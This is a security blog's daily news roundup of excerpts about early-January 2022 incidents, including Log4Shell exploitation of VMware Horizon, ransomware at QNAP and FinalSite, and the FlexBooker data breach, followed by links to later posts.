January 7, 2022

Fortify Security Team
Jan 7, 2022

Title: NHS Warns of Hackers Exploiting Log4shell in VMware Horizon
Date Published: January 7, 2022


Excerpt: “According to the NHS notice, the actor is leveraging the exploit to achieve remote code execution on vulnerable VMware Horizon deployments on public infrastructure. The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back malicious infrastructure,” explains the alert. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.“

Title: QNAP Warns of Ransomware Targeting Internet-Exposed NAS Devices
Date Published: January 7, 2022


Excerpt: “QNAP has warned customers today to secure Internet-exposed network-attached storage (NAS) devices immediately from ongoing ransomware and brute-force attacks. “QNAP urges all QNAP NAS users to follow the security setting instructions below to ensure the security of QNAP networking devices,” the Taiwanese NAS maker said in a press release issued today. The company warned users to check if their NAS is accessible over the internet by opening the Security Counselor, a built-in security portal for QNAP NAS devices.”

Title: Ransomware Attack Suffered by FinalSite Shuts Down Thousands of Websites
Date Published: January 7, 2022


Excerpt: “FinalSite is a software as a service (SaaS) company that provides K-12 school districts and institutions with website design, hosting, and content management solutions. FinalSite provides solutions for over 8,000 institutions and colleges in 115 countries. Recently, school districts whose websites were hosted by FinalSite discovered that they were no longer accessible or displayed errors. FinalSite did not reveal that they had been attacked at the time, instead stating that they were having error and “performance difficulties” across different services, primarily their Composer content management system.”

Title: Enterprises Worry About Increased Data Risk in Cloud
Date Published: January 6, 2022


Excerpt: “The massive shift to a more distributed work environment and adoption of cloud services to support new business models over the past two years has impacted how enterprises assess cyber-risk and manage cloud vulnerabilities. Respondents to Dark Reading’s 2021 Strategic Security Survey say the shift away from on-premises infrastructures has significantly raised the level of cyber-risk associated with cloud services. When it comes to assessing risk, enterprises may be feeling more optimistic. In the 2020 survey, 31% of respondents said assessing risk was among the biggest information security challenges facing the organization. That figure drops to 24% in the 2021 survey. Similarly, 49% in 2020 named managing complexity as among the biggest challenges, while just 35% say so in the 2021 report.”

Title: Chinese Scientist Pleads Guilty to Stealing US Agricultural Tech
Date Published: January 7, 2022


Excerpt: “Monsanto and The Climate Corporation developed an online platform for farmers to manage field and yield information in a bid to improve land productivity. One aspect of this technology was an algorithm called the Nutrient Optimizer, which US prosecutors say was considered “a valuable trade secret and their intellectual property.” According to the DoJ, the former employee stole this information “for the purpose of benefiting a foreign government, namely the People’s Republic of China.” In June 2017, Xiang left these companies and boarded a flight back to China a day after. The 44-year-old drew the attention of airport officials who conducted a search — but it was not until later that investigators found copies of the Nutrient Optimizer stored on his electronic devices.”

Title: Thousands of Schools Impacted After IT Provider Hit by Ransomware
Date Published: January 7, 2022


Excerpt: “Finalsite claimed it had uncovered no evidence that data had been stolen as part of the raid but admitted that forensic work was still ongoing. Double extortion involving the threat of leaking stolen data is now the norm for such attacks, according to ransomware experts. According to Coveware, over 80% of attacks in Q3 involved the theft of corporate information alongside file encryption. There’s no sign of exactly how many schools have been impacted by the attack, although a Reddit user claimed around 2,200 might have been disrupted.”

Title: Over 3.7 Million Accounts Were Compromised in the Flexbooker Data Breach
Date Published: January 7, 2022


Excerpt: “FlexBooker is an online appointment scheduling platform that allows users to schedule appointments and sync employee calendars. The attack was carried out by a group calling themselves Uawrongteam, who published links to archives and files containing IDs, driver’s licenses, photos. The threat actors claim the stolen database contains customer information, including names, emails, phone numbers, hashed passwords, and password salt. The company already notified local authorities and sent a data breach notification to the impacted customers. According to the notification, threat actors compromised the service’s Amazon cloud storage system.”

Title: Night Sky, a New Ransomware Operation in the Threat Landscape
Date Published: January 7, 2021


Excerpt: “Researchers from MalwareHunterteam first spotted a new ransomware family dubbed Night Sky that implements a double extortion model in attacks aimed at businesses. Once an encrypted file, the ransomware appends the ‘.night sky‘ extension to encrypted file names. The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen to the victims that will not pay the ransom.”

Title: New Mexico’s Bernalillo County Investigates Ransomware Attack
Date Published: January 6, 2021


Excerpt: “Bernalillo County is the most populous in New Mexico and includes the cities of Albuquerque, Los Ranchos, and Tijeras. Officials report the disruption likely occurred between midnight and 5:30 a.m. on Jan. 5. They have taken affected systems offline and severed network connections, as well as notified county system vendors, which are working to solve the issue and restore system functionality. While county buildings and offices are closed to the public, employees are working remotely to assist the public, officials wrote in a release. Emergency and public safety services are fully operational, Behavioral Health is operational, and community centers will remain open as scheduled. Its Treasurer’s Office is accepting tax payments through its online portal, through county drop boxes, and at any branch of the Rio Grande Credit Union, officials wrote.”

Title: Threat Actors Stole 1.1 Million Customer Accounts from 17 Well-Known Companies
Date Published: January 6, 2021


Excerpt: “After reviewing thousands of posts, the OAG compiled login credentials for customer accounts at 17 well-known companies, which included online retailers, restaurant chains, and food delivery services. In all, the OAG collected credentials for more than 1.1 million customer accounts, all of which appeared to have been compromised in credential stuffing attacks.” reads the report published by NY OAG. “The OAG contacted each of the 17 companies to alert them to the compromised accounts. The OAG also asked the companies to investigate and take steps to protect impacted customers. Every company did so.”

Recent Posts

June 10, 2022

Title: Bizarre Ransomware Sells Decryptor on Roblox Game Pass Store Date Published: June 9, 2022 https://www.bleepingcomputer.com/news/security/bizarre-ransomware-sells-decryptor-on-roblox-game-pass-store/ Excerpt: “A new ransomware is taking the unusual approach of...

June 9, 2022

Title: New Symbiote Malware Infects all Running Processes on Linux Systems Date Published: June 9, 2022 https://www.bleepingcomputer.com/news/security/new-symbiote-malware-infects-all-running-processes-on-linux-systems/ Excerpt: “A newly discovered Linux malware known...

June 8, 2022

Title: Surfshark, ExpressVPN pull out of India Over Data Retention Laws Date Published: June 7, 2022 https://www.bleepingcomputer.com/news/legal/surfshark-expressvpn-pull-out-of-india-over-data-retention-laws/ Excerpt: “Surfshark announced today they are shutting down...

June 6, 2022

Title: Italian City of Palermo Shuts Down all Systems to Fend off Cyberattack Date Published: June 6, 2022 https://www.bleepingcomputer.com/news/security/italian-city-of-palermo-shuts-down-all-systems-to-fend-off-cyberattack/ Excerpt: “The municipality of Palermo in...

June 3, 2022

Title: Critical Atlassian Confluence Zero-Day Actively Used in Attack Date Published: June 2, 2022 https://www.bleepingcomputer.com/news/security/critical-atlassian-confluence-zero-day-actively-used-in-attacks/ Excerpt: “Hackers are actively exploiting a new Atlassian...

June 2, 2022

Title: Conti Ransomware Targeted Intel Firmware for Stealthy Attacks Date Published: June 2, 2022 https://www.bleepingcomputer.com/news/security/conti-ransomware-targeted-intel-firmware-for-stealthy-attacks/ Excerpt: “Researchers analyzing the leaked chats of the...

June 1, 2022

Title: Ransomware Attacks Need Less Than Four Days to Encrypt Systems Date Published: June 1, 2022 https://www.bleepingcomputer.com/news/security/ransomware-attacks-need-less-than-four-days-to-encrypt-systems/ Excerpt: “The duration of ransomware attacks in 2021...